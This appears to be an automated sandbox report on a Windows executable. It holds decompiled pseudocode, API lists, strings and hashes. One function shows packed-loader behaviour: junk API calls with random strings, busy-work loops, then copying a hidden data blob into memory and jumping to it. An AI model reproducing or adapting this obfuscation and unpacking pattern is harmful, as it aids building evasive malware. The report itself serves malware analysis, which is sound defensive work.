                  • Part of subcall function 0040906F: RtlEncodePointer.NTDLL(00000000,?,004090E8,00000000,0040D6C0,0042BCC8,00000000,00000314,?,00408984,0042BCC8,Microsoft Visual C++ Runtime Library,00012010), ref: 004090D6
                Memory Dump Source
                • Source File: 00000000.00000002.530438650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.530431935.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.530462869.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.530477919.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                Similarity
                • API ID: Value$EncodePointer__encode_pointer
                • String ID:
                • API String ID: 2585649348-0
                • Opcode ID: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                • Instruction ID: 9786210163ad4483c0a19228d0951d229a32f2fe618db9620de7aae7b9d0445c
                • Opcode Fuzzy Hash: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                • Instruction Fuzzy Hash:
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00403790() {
                				void* _t2;
                
                				_t2 = LocalAlloc(0,  *0x667f64); // executed
                				 *0x667ed4 = _t2;
                				return _t2;
                			}




                0x00403798
                0x0040379e
                0x004037a3

                APIs
                • LocalAlloc.KERNELBASE(00000000,?), ref: 00403798
                Memory Dump Source
                • Source File: 00000000.00000002.530438650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.530431935.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.530462869.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.530477919.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                Similarity
                • API ID: AllocLocal
                • String ID:
                • API String ID: 3494564517-0
                • Opcode ID: 084d6743c0e473d49b09e07d7cae7b346d9820e874b07a3778090b4f1de88397
                • Instruction ID: 0ec96e80b0546baaabe1387215998cce9f50f0998a92b6cbbce2019a817ad1b3
                • Opcode Fuzzy Hash: 084d6743c0e473d49b09e07d7cae7b346d9820e874b07a3778090b4f1de88397
                • Instruction Fuzzy Hash: E7B092B01092009BD3009B50AE04B203665A348306F001091F940C1264D6B009048B14
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 74%
                			E00403870(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48, intOrPtr _a52, intOrPtr _a56, intOrPtr _a60, intOrPtr _a64, intOrPtr _a68, intOrPtr _a72, intOrPtr _a76, intOrPtr _a80, intOrPtr _a84, intOrPtr _a88, intOrPtr _a92, intOrPtr _a96, intOrPtr _a108, intOrPtr _a112, char _a116, intOrPtr _a120, long _a124, struct _CONSOLE_CURSOR_INFO _a128, struct _DCB _a140, struct _OSVERSIONINFOW _a176, char _a432, short _a472, void _a2484, char _a3504) {
                				short _v0;
                				short _v4;
                				intOrPtr _v8;
                				intOrPtr _v12;
                				intOrPtr _v16;
                				short _v20;
                				intOrPtr _v24;
                				intOrPtr _v28;
                				char _v32;
                				short _t305;
                				short _t306;
                				intOrPtr* _t468;
                				void* _t473;
                				intOrPtr* _t474;
                				void* _t483;
                
                				L0040EBC0(0x11dc);
                				if( *0x667f64 == 0xac) {
                					GetStringTypeExA(0, 0, "renenivucivefukuvemosudexiyozim", 0,  &_v0);
                					__imp__FindFirstVolumeMountPointW(L"gesorakocinobinuruyamikufiw",  &_a472, 0);
                					GetPrivateProfileIntA("jasozarinirazawiveyiy xupoyihelituwowakewezoyu gayasugudemexobahetoyesovunadub xesepalopuv", "fevadixifahazikiletidikowavative hiferof hadafotahufowojunazo", 0, "fucuwematahafenibezujulokoc yuyarahim");
                					WaitForSingleObject(0, 0);
                					E004046E4( &_a116);
                					E004047C2( &_a116);
                					L004046CB();
                					_push(0);
                					E00404A75();
                					E00404A46(0);
                					E00404A5C(0, 0);
                					_t483 = _t483 + 0x10;
                				}
                				 *0x667f64 =  *0x667f64 + 0x11b1b;
                				E00403790();
                				E004037B0();
                				_t305 = 0;
                				_v0 = 0;
                				if( *0x667f64 <= 0) {
                					L7:
                					_t306 = 0;
                					_v0 = 0;
                					do {
                						if( *0x667f64 + _t306 == 0xe) {
                							MapGenericMask(0, 0);
                							DebugBreak();
                							FreeConsole();
                							_v0(0);
                							FreeConsole();
                							InterlockedExchangeAdd( &_a124, 0);
                							WaitForMultipleObjectsEx(0, 0, 0, 0, 0);
                							_t306 = _v4;
                						}
                						_t306 = _t306 + 1;
                						_v0 = _t306;
                					} while (_t306 < 0x4fe229);
                					_t473 = 0x4cc;
                					do {
                						GetCharWidthW(0, 0, 0, 0);
                						GetCharABCWidthsFloatW(0, 0, 0, 0);
                						_t473 = _t473 - 1;
                					} while (_t473 != 0);
                					while(1) {
                						GetLastError();
                						if(_t473 < 0x3b9f945) {
                							_a20 = 0x3ae40fea;
                							_a72 = 0x4da9f927;
                							_v0 = 0x76dbcd96;
                							_a64 = 0x5c01b59;
                							_a52 = 0x69b972f0;
                							_a8 = 0x6315b1bc;
                							_a16 = 0x268efdf3;
                							_a76 = 0x758aab55;
                							_a56 = 0x293c9e6e;
                							_a48 = 0x7d25b6d7;
                							_a40 = 0x49f78072;
                							_a4 = 0x411e99f8;
                							_v4 = 0x58c56864;
                							_a108 = 0x3a5c90d5;
                							_a12 = 0x55787069;
                							_a116 = 0x61b5b59f;
                							_a96 = 0x739d0620;
                							_a36 = 0x3eef0288;
                							_a92 = 0x49cdaba2;
                							_a88 = 0x1f200a15;
                							_v12 = 0x6ab47c1e;
                							_a60 = 0x60bcbe35;
                							_v20 = 0x2247b61f;
                							_a68 = 0xb7d6359;
                							_a112 = 0xa8bb680;
                							_a28 = 0x5f860f6d;
                							_a44 = 0x1f006e87;
                							_a80 = 0x344135c6;
                							_v16 = 0x6da7e3e1;
                							_v32 = 0x479039f5;
                							_a84 = 0x9fa3415;
                							_v8 = 0x7c643086;
                							_v24 = 0x2694f336;
                							_v28 = 0x6cb4a5e8;
                							_a32 = 0x2d3a3b6a;
                							_a120 = 0x4b4207e4;
                							_a24 = 0x6a30f715;
                							_a124 = 0x40a7a320;
                							_a20 = _a20 - 0x3d2cd01f;
                							_a20 = _a20 - 0x1a8468ec;
                							_a72 = _a72 - 0x35b81e1b;
                							_v0 = _v0 - 0x1f2956f1;
                							_a72 = _a72 + 0x10bd938a;
                							_a72 = _a72 + 0x387b6b7d;
                							_a64 = _a64 + 0x55e9422f;
                							_a20 = _a20 + 0x2f9fc9;
                							_a64 = _a64 + 0x685f757d;
                							_v0 = _v0 + 0x18684b6a;
                							_v4 = _v4 + 0xc792e25;
                							_a12 = _a12 - 0x71c2a565;
                							_a40 = _a40 + 0x41d3e078;
                							_v0 = _v0 + 0x6066dbc4;
                							_a12 = _a12 - 0x1195370a;
                							_a40 = _a40 + 0x50570176;
                							_v0 = _v0 - 0x2bd3ed46;
                							_a92 = _a92 + 0x392008dc;
                							_a116 = _a116 - 0x5754d300;
                							_a60 = _a60 - 0x2ce43c9b;
                							_v4 = _v4 - 0x30721d20;
                							_a36 = _a36 - 0x2ccd0822;
                							_v20 = _v20 + 0x41048ed8;
                							_a96 = _a96 - 0xc569312;
                							_a60 = _a60 + 0x47dd74a5;
                							_a8 = _a8 - 0x28076cb2;
                							_a76 = _a76 - 0x436d683b;
                							_a96 = _a96 + 0x6106b7c4;
                							_v0 = _v0 - 0x41aae26e;
                							_a12 = _a12 - 0x5ce84155;
                							_a36 = _a36 + 0x2234c681;
                							_a64 = _a64 - 0x290d37f4;
                							_v16 = _v16 - 0x2476c0e6;
                							_a12 = _a12 - 0xfb5be67;
                							_v16 = _v16 + 0x69bdf9d;
                							_v28 = _v28 - 0x1cf7abbe;
                							_a4 = _a4 + 0xbea7d89;
                							_a60 = _a60 + 0x7a5b1c5b;
                							_a88 = _a88 - 0x18c76000;
                							_a76 = _a76 + 0x46a1d242;
                						}
                						if(_t473 > 0xbeedf1) {
                							break;
                						}
                						_t473 = _t473 + 1;
                						if(_t473 < 0x81043) {
                							continue;
                						}
                						break;
                					}
                					E00403660();
                					E00403770();
                					_t474 = __imp__ReplaceFileA;
                					_v32 = 0x7b;
                					do {
                						if( *0x667f64 == 0x86) {
                							 *_t474(0, 0, 0, 0, 0, 0);
                							WritePrivateProfileStringW(0, 0, 0, 0);
                						}
                						if( *0x667f64 == 0xf) {
                							lstrcmpiW(0, 0);
                							CreateEventW(0, 0, 0, 0);
                						}
                						_t292 =  &_v32;
                						 *_t292 = _v32 - 1;
                					} while ( *_t292 != 0);
                					_t468 = __imp__CreateActCtxA;
                					_v32 = 0x3078f;
                					do {
                						if( *0x667f64 == 0x83) {
                							MulDiv(0, 0, 0);
                							 *_t468( &_a128);
                							GetFileAttributesExW(0, 0,  &_a2484);
                							GetLogicalDriveStringsA(0,  &_a3504);
                							__imp__GetLongPathNameA(0,  &_a432, 0);
                							WritePrivateProfileStructW(0, 0, 0, 0, 0);
                							IsBadReadPtr(0, 0);
                							CancelWaitableTimer(0);
                							GetFileType(0);
                							GetModuleHandleA(0);
                						}
                						_t299 =  &_v32;
                						 *_t299 = _v32 - 1;
                					} while ( *_t299 != 0);
                					E004033B0();
                					 *0x667f58 =  *0x667ed4;
                					goto __eax;
                				} else {
                					do {
                						 *((char*)( *0x667ed4 + _t305)) =  *((intOrPtr*)( *0x66e6c0 + _t305 + 0x11b1b));
                						if( *0x667f64 == 0xa8) {
                							GetConsoleCursorInfo(0,  &_a128);
                							GetModuleFileNameW(0,  &_a472, 0);
                							EnumFontsW(0, L"hagayaxewewagucizinahegej", 0, 0);
                							GetVersionExW( &_a176);
                							__imp__GetConsoleAliasesLengthA(0);
                							SleepEx(0, 0);
                							CreateFileMappingW(0, 0, 0, 0, 0, 0);
                							CreateMutexA(0, 0, "wilofusasonamapofedahu");
                							GetCommState(0,  &_a140);
                							FreeConsole();
                							_t305 = _v20;
                						}
                						_t305 = _t305 + 1;
                						_v0 = _t305;
                					} while (_t305 <  *0x667f64);
                					goto L7;
                				}
                			}


















                0x00403875
                0x00403888
                0x0040389e
                0x004038b3
                0x004038ca
                0x004038d4
                0x004038e1
                0x004038ed
                0x004038f2
                0x004038f7
                0x004038f9
                0x00403903
                0x0040390f
                0x00403914
                0x00403914
                0x00403917
                0x00403921
                0x00403926
                0x00403931
                0x00403933
                0x0040393d
                0x00403a11
                0x00403a23
                0x00403a25
                0x00403a29
                0x00403a34
                0x00403a3a
                0x00403a3c
                0x00403a3e
                0x00403a42
                0x00403a44
                0x00403a50
                0x00403a60
                0x00403a66
                0x00403a66
                0x00403a6a
                0x00403a70
                0x00403a70
                0x00403a82
                0x00403a87
                0x00403a8f
                0x00403a99
                0x00403a9b
                0x00403a9b
                0x00403aa6
                0x00403aa6
                0x00403aae
                0x00403ab4
                0x00403abc
                0x00403ac4
                0x00403acc
                0x00403ad4
                0x00403adc
                0x00403ae4
                0x00403aec
                0x00403af4
                0x00403afc
                0x00403b04
                0x00403b0c
                0x00403b14
                0x00403b1c
                0x00403b27
                0x00403b2f
                0x00403b3a
                0x00403b45
                0x00403b4d
                0x00403b58
                0x00403b63
                0x00403b6b
                0x00403b73
                0x00403b7b
                0x00403b83
                0x00403b8e
                0x00403b96
                0x00403b9e
                0x00403ba9
                0x00403bb1
                0x00403bb9
                0x00403bc4
                0x00403bcc
                0x00403bd4
                0x00403bdc
                0x00403be4
                0x00403bef
                0x00403bf7
                0x00403c02
                0x00403c24
                0x00403c2c
                0x00403c41
                0x00403c63
                0x00403c6b
                0x00403c73
                0x00403c7b
                0x00403c83
                0x00403c98
                0x00403ca0
                0x00403ca8
                0x00403cbd
                0x00403cd2
                0x00403ce7
                0x00403cfc
                0x00403d04
                0x00403d0c
                0x00403d17
                0x00403d22
                0x00403d2a
                0x00403d32
                0x00403d3a
                0x00403d42
                0x00403d4d
                0x00403d75
                0x00403daa
                0x00403db2
                0x00403dd7
                0x00403dec
                0x00403df4
                0x00403e1c
                0x00403e24
                0x00403e2c
                0x00403e34
                0x00403e3c
                0x00403e57
                0x00403e6c
                0x00403e74
                0x00403e7f
                0x00403e7f
                0x00403e8d
                0x00000000
                0x00000000
                0x00403e8f
                0x00403e96
                0x00000000
                0x00000000
                0x00000000
                0x00403e96
                0x00403e9c
                0x00403ea1
                0x00403ea6
                0x00403ebe
                0x00403ed0
                0x00403eda
                0x00403ee8
                0x00403ef2
                0x00403ef2
                0x00403efb
                0x00403f01
                0x00403f0b
                0x00403f0b
                0x00403f0d
                0x00403f0d
                0x00403f0d
                0x00403f1a
                0x00403f2c
                0x00403f34
                0x00403f3e
                0x00403f46
                0x00403f50
                0x00403f5e
                0x00403f6a
                0x00403f78
                0x00403f88
                0x00403f92
                0x00403f9a
                0x00403fa2
                0x00403faa
                0x00403faa
                0x00403fb0
                0x00403fb0
                0x00403fb0
                0x00403fbb
                0x00403fc5
                0x00403fd4
                0x00403943
                0x00403960
                0x00403973
                0x00403980
                0x0040398c
                0x0040399a
                0x004039a7
                0x004039b1
                0x004039b9
                0x004039c3
                0x004039d5
                0x004039e4
                0x004039f4
                0x004039fa
                0x004039fc
                0x004039fc
                0x00403a00
                0x00403a01
                0x00403a05
                0x00000000
                0x00403960

                APIs
                • GetStringTypeExA.KERNEL32(00000000,00000000,renenivucivefukuvemosudexiyozim,00000000,?), ref: 0040389E
                • FindFirstVolumeMountPointW.KERNEL32(gesorakocinobinuruyamikufiw,?,00000000), ref: 004038B3
                • GetPrivateProfileIntA.KERNEL32 ref: 004038CA
                • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 004038D4
                  • Part of subcall function 00404A46: __wcstoi64.LIBCMT ref: 00404A52
                  • Part of subcall function 00404A5C: __wcstoi64_l.LIBCMT ref: 00404A6B
                • GetConsoleCursorInfo.KERNEL32(00000000,?), ref: 0040398C
                • GetModuleFileNameW.KERNEL32(00000000,?,00000000), ref: 0040399A
                • EnumFontsW.GDI32(00000000,hagayaxewewagucizinahegej,00000000,00000000), ref: 004039A7
                • GetVersionExW.KERNEL32(?), ref: 004039B1
                • GetConsoleAliasesLengthA.KERNEL32(00000000), ref: 004039B9
                • SleepEx.KERNEL32(00000000,00000000), ref: 004039C3
                • CreateFileMappingW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 004039D5
                • CreateMutexA.KERNEL32(00000000,00000000,wilofusasonamapofedahu), ref: 004039E4
                • GetCommState.KERNEL32(00000000,?), ref: 004039F4
                • FreeConsole.KERNEL32 ref: 004039FA
                • MapGenericMask.ADVAPI32(00000000,00000000), ref: 00403A3A
                • DebugBreak.KERNEL32 ref: 00403A3C
                • FreeConsole.KERNEL32 ref: 00403A3E
                • AttachConsole.KERNEL32(00000000), ref: 00403A42
                • FreeConsole.KERNEL32 ref: 00403A44
                • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00403A50
                • WaitForMultipleObjectsEx.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00403A60
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.530438650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.530431935.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.530462869.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.530477919.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                Similarity
                • API ID: Console$Free$CreateFileWait$AliasesAttachBreakCommCursorDebugEnumExchangeFindFirstFontsGenericInfoInterlockedLengthMappingMaskModuleMountMultipleMutexNameObjectObjectsPointPrivateProfileSingleSleepStateStringTypeVersionVolume__wcstoi64__wcstoi64_l
                • String ID: )O$;hmC$>P$TDu$UA\$fevadixifahazikiletidikowavative hiferof hadafotahufowojunazo$fucuwematahafenibezujulokoc yuyarahim$gesorakocinobinuruyamikufiw$hagayaxewewagucizinahegej$j;:-$jasozarinirazawiveyiy xupoyihelituwowakewezoyu gayasugudemexobahetoyesovunadub xesepalopuv$renenivucivefukuvemosudexiyozim$wilofusasonamapofedahu${${*,$}k{8$}u_h
                • API String ID: 3618697742-3763550029
                • Opcode ID: c3ab265132682f6d0abb0ea47d043840aa86616c5551d2cd178f555f647553a2
                • Instruction ID: c8618d58610d18ae7664207781e6ad4b49abab7244f618895114b1a2e8edddd5
                • Opcode Fuzzy Hash: c3ab265132682f6d0abb0ea47d043840aa86616c5551d2cd178f555f647553a2
                • Instruction Fuzzy Hash: 6502A9756083809FE360DF65D946B4ABBF4FB84705F10482DF699AB2A0C7B49984CF0B
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • _hwrite.KERNEL32(00000000,00000000,00000000), ref: 0040444C
                • FindAtomW.KERNEL32(00000000), ref: 00404453
                • GetStdHandle.KERNEL32(00000000), ref: 0040445A
                • _calloc.LIBCMT ref: 00404482
                  • Part of subcall function 00404A06: __calloc_impl.LIBCMT ref: 00404A1B
                • _calloc.LIBCMT ref: 00404489
                  • Part of subcall function 00404A80: __indefinite.LIBCMT ref: 00406887
                • __floor_pentium4.LIBCMT ref: 004044C4
                • _fputwc.LIBCMT ref: 004044CD
                  • Part of subcall function 00404C4D: _malloc.LIBCMT ref: 00404C67
                • CharLowerBuffA.USER32(?,00000000,313180DD,3802937C,2322E823,2322E823,151A9CB0,58FE3BFC,3B78AB07,1190BBCD,5370C228,5204C22F,46857BF5,1ADEE1C7,5FA5E152,65B098C1), ref: 00404561
                • GetModuleHandleA.KERNEL32(kernel32.dll,313180DD,3802937C,2322E823,2322E823,151A9CB0,58FE3BFC,3B78AB07,1190BBCD,5370C228,5204C22F,46857BF5,1ADEE1C7,5FA5E152,65B098C1,786D3085), ref: 00404576
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.530438650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.530431935.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.530462869.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.530477919.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                Similarity
                • API ID: Handle_calloc$AtomBuffCharFindLowerModule__calloc_impl__floor_pentium4__indefinite_fputwc_hwrite_malloc
                • String ID: #"#$.d|1$K[$T#0y$ZBE$kernel32.dll
                • API String ID: 2239919688-992971717
                • Opcode ID: 4f630acdbfd7b5b1266d8c80dfe78307f3496ad164effe4b94313500278a85e3
                • Instruction ID: c66ba64033baa81c8e24b855b7833866e70bb26c4f574454c8bbbbec6359a038
                • Opcode Fuzzy Hash: 4f630acdbfd7b5b1266d8c80dfe78307f3496ad164effe4b94313500278a85e3
                • Instruction Fuzzy Hash: 79D12CB5608380CFD3609F2AD885B8BFBE4BF85714F10891DE69A8B661D7348884CF57
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 57%
                			E0041251A(void* _a4, signed int _a16, signed int _a20, short* _a24) {
                				signed int _v8;
                				short _v10;
                				signed int _v12;
                				signed int _v14;
                				signed int _v16;
                				signed int _v18;
                				signed int _v20;
                				char _v25;
                				signed int _v26;
                				signed int _v28;
                				signed int _v30;
                				signed int _v32;
                				signed int _v34;
                				signed int _v36;
                				char _v41;
                				signed int _v42;
                				char _v43;
                				signed int _v44;
                				char _v45;
                				char _v46;
                				char _v47;
                				char _v48;
                				char _v49;
                				char _v50;
                				char _v51;
                				char _v52;
                				intOrPtr _v56;
                				intOrPtr _v60;
                				char _v62;
                				char _v64;
                				signed int _v68;
                				signed int _v72;
                				signed int _v76;
                				signed int _v80;
                				signed int _v84;
                				signed int _v88;
                				signed int _v92;
                				signed int _v96;
                				unsigned int _v100;
                				intOrPtr _v104;
                				signed short* _v108;
                				signed short* _v112;
                				signed int _v116;
                				char _v120;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				signed int _t367;
                				signed short _t377;
                				signed int _t379;
                				signed int _t386;
                				signed int* _t388;
                				intOrPtr _t389;
                				unsigned int _t392;
                				signed int _t395;
                				signed int _t396;
                				intOrPtr _t397;
                				void* _t420;
                				signed int _t429;
                				unsigned int _t430;
                				signed short* _t435;
                				signed int _t437;
                				signed int _t443;
                				intOrPtr _t447;
                				signed int _t456;
                				unsigned int _t457;
                				signed int _t470;
                				signed int _t473;
                				short* _t479;
                				signed int _t483;
                				char* _t487;
                				intOrPtr* _t488;
                				signed int _t489;
                				signed int _t497;
                				signed short _t504;
                				char* _t510;
                				unsigned int _t512;
                				signed int _t514;
                				unsigned int _t517;
                				signed int _t522;
                				signed int _t523;
                				signed int _t524;
                				signed int _t544;
                				signed int _t546;
                				signed int _t548;
                				signed int _t551;
                				signed int _t552;
                				void* _t554;
                				signed int _t560;
                				signed int _t573;
                				signed int _t574;
                				char _t587;
                				signed int _t588;
                				unsigned int _t590;
                				signed int _t592;
                				signed int _t593;
                				signed int _t595;
                				signed int _t600;
                				signed int _t601;
                				signed int _t602;
                				intOrPtr _t607;
                				signed int _t609;
                				signed int* _t614;
                				signed int _t619;
                				signed int _t620;
                				signed int _t622;
                				signed int _t632;
                				signed int _t638;
                				signed int* _t647;
                				signed int _t653;
                
                				_t367 =  *0x42a280; // 0x394af7
                				_v8 = _t367 ^ _t653;
                				_t479 = _a24;
                				asm("movsd");
                				asm("movsd");
                				asm("movsw");
                				_t574 = _v12;
                				_t497 = _t574 & 0x00008000;
                				_t575 = _t574 & 0x00007fff;
                				_v100 = _t479;
                				_v52 = 0xcc;
                				_v51 = 0xcc;
                				_v50 = 0xcc;
                				_v49 = 0xcc;
                				_v48 = 0xcc;
                				_v47 = 0xcc;
                				_v46 = 0xcc;
                				_v45 = 0xcc;
                				_v44 = 0xcc;
                				_v43 = 0xcc;
                				_v42 = 0xfb;
                				_v41 = 0x3f;
                				_v120 = 1;
                				_v116 = _t497;
                				if(_t497 == 0) {
                					 *((char*)(_t479 + 2)) = 0x20;
                				} else {
                					 *((char*)(_t479 + 2)) = 0x2d;
                				}
                				_t625 = _v16;
                				_t609 = _v20;
                				if(_t575 != 0 || _t625 != 0 || _t609 != 0) {
                					__eflags = _t575 - 0x7fff;
                					if(_t575 != 0x7fff) {
                						_t377 = (((_t575 & 0x0000ffff) >> 0x00000008) + (_t625 >> 0x00000018) * 0x00000002) * 0x0000004d + (_t575 & 0x0000ffff) * 0x00004d10 - 0x134312f4 >> 0x00000010 & 0x0000ffff;
                						_v36 = 0;
                						_t483 =  ~_t377;
                						_v80 = _t377;
                						_v26 = _t575;
                						_v30 = _t625;
                						_v34 = _t609;
                						_v104 = 0x42b320;
                						__eflags = _t483;
                						if(__eflags == 0) {
                							L86:
                							_t504 = _v28 >> 0x10;
                							__eflags = _t504 - 0x3fff;
                							if(_t504 < 0x3fff) {
                								L139:
                								__eflags = _a20 & 0x00000001;
                								_t575 = _v100;
                								_t379 = _v80;
                								_t609 = _a16;
                								 *_t575 = _t379;
                								if((_a20 & 0x00000001) == 0) {
                									L142:
                									__eflags = _t609 - 0x15;
                									if(_t609 > 0x15) {
                										_t609 = 0x15;
                									}
                									_t625 = (_v28 >> 0x10) - 0x3ffe;
                									__eflags = 0;
                									_v26 = 0;
                									_v72 = 8;
                									do {
                										_v36 = _v36 << 1;
                										_t305 =  &_v72;
                										 *_t305 = _v72 - 1;
                										__eflags =  *_t305;
                										_v32 = _v32 + _v32 | _v36 >> 0x0000001f;
                										_v28 = _v28 + _v28 | _v32 >> 0x0000001f;
                									} while ( *_t305 != 0);
                									__eflags = _t625;
                									if(_t625 >= 0) {
                										L149:
                										_t386 = _t609 + 1;
                										_t487 = _t575 + 4;
                										_v68 = _t487;
                										_v80 = _t386;
                										__eflags = _t386;
                										if(_t386 <= 0) {
                											L161:
                											_t488 = _t487 - 1;
                											_t489 = _t488 - 1;
                											__eflags =  *_t488 - 0x35;
                											if( *_t488 >= 0x35) {
                												while(1) {
                													__eflags = _t489 - _v68;
                													if(_t489 < _v68) {
                														break;
                													}
                													__eflags =  *_t489 - 0x39;
                													if( *_t489 != 0x39) {
                														break;
                													}
                													 *_t489 = 0x30;
                													_t489 = _t489 - 1;
                													__eflags = _t489;
                												}
                												_t388 = _v100;
                												__eflags = _t489 - _v68;
                												if(_t489 < _v68) {
                													_t489 = _t489 + 1;
                													 *_t388 =  *_t388 + 1;
                													__eflags =  *_t388;
                												}
                												 *_t489 =  *_t489 + 1;
                												__eflags =  *_t489;
                												L169:
                												_t489 = _t489 - _t388 - 3;
                												__eflags = _t489;
                												_t388[0] = _t489;
                												 *((char*)( &(_t388[1]) + _t489)) = 0;
                												_t389 = _v120;
                												goto L170;
                											}
                											_t510 = _v68;
                											while(1) {
                												__eflags = _t489 - _t510;
                												if(_t489 < _t510) {
                													break;
                												}
                												__eflags =  *_t489 - 0x30;
                												if( *_t489 != 0x30) {
                													break;
                												}
                												_t489 = _t489 - 1;
                												__eflags = _t489;
                											}
                											_t388 = _v100;
                											__eflags = _t489 - _t510;
                											if(_t489 >= _t510) {
                												goto L169;
                											}
                											 *_t388 = 0;
                											__eflags = _v116 - 0x8000;
                											_t388[0] = 1;
                											_t575 = ((0x8000 | __eflags != 0x00000000) - 0x00000001 & 0x0000000d) + 0x20;
                											_t388[0] = ((0x8000 | __eflags != 0x00000000) - 0x00000001 & 0x0000000d) + 0x20;
                											 *_t510 = 0x30;
                											_t388[1] = 0;
                											goto L7;
                										} else {
                											goto L150;
                										}
                										do {
                											L150:
                											_t392 = _v32;
                											asm("movsd");
                											asm("movsd");
                											asm("movsd");
                											_v36 = _v36 << 1;
                											_v36 = _v36 << 1;
                											_t512 = _t392 + _t392 | _v36 >> 0x0000001f;
                											_t587 = _v64;
                											_t514 = (_v28 + _v28 | _t392 >> 0x0000001f) + (_v28 + _v28 | _t392 >> 0x0000001f) | _t512 >> 0x0000001f;
                											_t395 = _v36;
                											_t632 = _t512 + _t512 | _v36 >> 0x0000001f;
                											_t609 = _t587 + _t395;
                											__eflags = _t609 - _t395;
                											if(_t609 < _t395) {
                												L152:
                												_t396 = _t632 + 1;
                												_t588 = 0;
                												__eflags = _t396 - _t632;
                												if(_t396 < _t632) {
                													L154:
                													_t588 = 1;
                													__eflags = 1;
                													L155:
                													_t632 = _t396;
                													__eflags = _t588;
                													if(_t588 != 0) {
                														_t514 = _t514 + 1;
                														__eflags = _t514;
                													}
                													L157:
                													_t397 = _v60;
                													_t590 = _t397 + _t632;
                													_v72 = _t590;
                													__eflags = _t590 - _t632;
                													if(_t590 < _t632) {
                														L159:
                														_t514 = _t514 + 1;
                														__eflags = _t514;
                														goto L160;
                													}
                													__eflags = _t590 - _t397;
                													if(_t590 >= _t397) {
                														goto L160;
                													}
                													goto L159;
                												}
                												__eflags = _t396 - 1;
                												if(_t396 >= 1) {
                													goto L155;
                												}
                												goto L154;
                											}
                											__eflags = _t609 - _t587;
                											if(_t609 >= _t587) {
                												goto L157;
                											}
                											goto L152;
                											L160:
                											_t575 = _t590 >> 0x1f;
                											_t517 = _t514 + _v56 + _t514 + _v56 | _t590 >> 0x0000001f;
                											_v36 = _t609 + _t609;
                											_t634 = _v72;
                											_v28 = _t517;
                											_t625 = _v72 + _t634 | _t609 >> 0x0000001f;
                											 *_t487 = (_t517 >> 0x18) + 0x30;
                											_t487 = _t487 + 1;
                											_v80 = _v80 - 1;
                											__eflags = _v80;
                											_v32 = _v72 + _t634 | _t609 >> 0x0000001f;
                											_v25 = 0;
                										} while (_v80 > 0);
                										goto L161;
                									}
                									_t625 =  ~_t625 & 0x000000ff;
                									__eflags = _t625;
                									if(_t625 <= 0) {
                										goto L149;
                									} else {
                										goto L148;
                									}
                									do {
                										L148:
                										_v28 = _v28 >> 1;
                										_t625 = _t625 - 1;
                										_v32 = _v32 >> 0x00000001 | _v28 << 0x0000001f;
                										_v36 = _v36 >> 0x00000001 | _v32 << 0x0000001f;
                										__eflags = _t625;
                									} while (_t625 > 0);
                									goto L149;
                								}
                								_t609 = _t609 + _t379;
                								__eflags = _t609;
                								if(_t609 > 0) {
                									goto L142;
                								}
                								 *_t575 = 0;
                								__eflags = _v116 - 0x8000;
                								 *((char*)(_t575 + 3)) = 1;
                								 *((char*)(_t575 + 2)) = ((0x8000 | _v116 != 0x00008000) - 0x00000001 & 0x0000000d) + 0x20;
                								 *((char*)(_t575 + 4)) = 0x30;
                								 *((char*)(_t575 + 5)) = 0;
                								goto L7;
                							}
                							_v80 = _v80 + 1;
                							_v84 = 0;
                							_v20 = 0;
                							_v16 = 0;
                							_v12 = 0;
                							_t592 = _v42;
                							_t522 = _t504 & 0x0000ffff;
                							_t523 = _t522 & 0x00007fff;
                							_t593 = _t592 & 0x00007fff;
                							_t489 = (_t592 ^ _t522) & 0x00008000;
                							_v96 = _t489;
                							_t625 = _t593 + _t523 & 0x0000ffff;
                							__eflags = _t523 - 0x7fff;
                							if(_t523 >= 0x7fff) {
                								L137:
                								__eflags = _t489;
                								_v32 = _v32 & 0x00000000;
                								_t416 = ((0 | _t489 == 0x00000000) - 0x00000001 & 0x80000000) + 0x7fff8000;
                								_t280 =  &_v36;
                								 *_t280 = _v36 & 0x00000000;
                								__eflags =  *_t280;
                								L138:
                								_v28 = _t416;
                								goto L139;
                							}
                							__eflags = _t593 - 0x7fff;
                							if(_t593 >= 0x7fff) {
                								goto L137;
                							}
